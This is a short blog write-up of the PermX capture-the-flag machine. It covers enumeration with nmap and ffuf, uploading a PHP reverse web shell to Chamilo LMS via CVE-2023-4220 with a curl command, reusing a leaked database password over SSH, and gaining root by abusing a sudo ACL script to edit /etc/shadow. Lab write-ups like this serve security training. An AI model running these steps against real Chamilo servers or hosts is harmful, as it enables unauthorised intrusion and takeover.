rizi85

App Sec / Red Teamer

1 minute read

PermX

What can go wrong when a free and open source LMS is vulnerable? Basically everything! This time was Chamilo, next time…

Information gathering

Enumeration

nmap

Command:

nmap -sC -sV -p- -A 10.10.11.23

Results:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 e2:5c:5d:8c:47:3e:d8:72:f7:b4:80:03:49:86:6d:ef (ECDSA)
|_  256 1f:41:02:8e:6b:17:18:9c:a0:ac:54:23:e9:71:30:17 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-title: eLEARNING
|_http-server-header: Apache/2.4.52 (Ubuntu)

ffuf

Command:

ffuf -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt -H 'Host: FUZZ.permx.htb' -u http://permx.htb -fc 302

Results:

lms                     [Status: 200, Size: 19347, Words: 4910, Lines: 353, Duration: 71ms]
www                     [Status: 200, Size: 36182, Words: 12829, Lines: 587, Duration: 48ms]
WWW                     [Status: 200, Size: 36182, Words: 12829, Lines: 587, Duration: 48ms]

Exploitation

Foothold

  1. Check subdomain lms.permx.htb is has an installation of Chamilo LMS
  2. The LMS is vulnerable to file upload CVE-2023-4220: https://starlabs.sg/advisories/23/23-4220/?source=post_page—–136bfcb54ac2——————————–
  3. Using curl we can upload a revwebshell 
    curl -F 'bigUploadFile=@rizi85_was_here.php' 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
  4. Check the folder were updates are stored and run the shell: 
    http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/
  5. Once on the server check files /var/www/chamilo/app/config there is a configuration.php containing DB credentials 
    // Database connection settings.
$_configuration['db_host'] = 'localhost';
$_configuration['db_port'] = '3306';
$_configuration['main_database'] = 'chamilo';
$_configuration['db_user'] = 'chamilo';
$_configuration['db_password'] = '03F6lY3uXAP2bkW8';
// Enable access to database management for platform admins.
$_configuration['db_manager_enabled'] = false;
  6. Checking home folder or content of /etc/passwd we can see there is a user called “mtz” on the machine, we can SSH with this user and DB password

Data exfiltration

  1. Get the content of the user flag: [UserFlag]

Privilege escalation

  1. Run sudo -l and see user mtz can run: 
    User mtz may run the following commands on permx:  
(ALL : ALL) NOPASSWD: /opt/acl.sh
  2. For privesc: 
    mtz@permx:~$ ln -s / root  
mtz@permx:~$ sudo /opt/acl.sh mtz rwx /home/mtz/root/etc/shadow  
mtz@permx:~$ nano /etc/shadow
  3. Now we will copy the mtz hash in place of root hash and will login with the same password
  4. Finally we can su root

Data exfiltration

  1. Get the root flag: [RootFlag]

You may also enjoy

Include machine on THM

100x100

6 minute read

The Include machine puts your server exploitation skills to the test. With a focus on server-side vulnerabilities, this challenge requires an understanding o...

Backtrack CTF machine on THM

100x100

12 minute read

Backtrack CTF offers an exciting medium-level challenge designed to keep you on your toes with a variety of obstacles. From the very start, you’ll dive into ...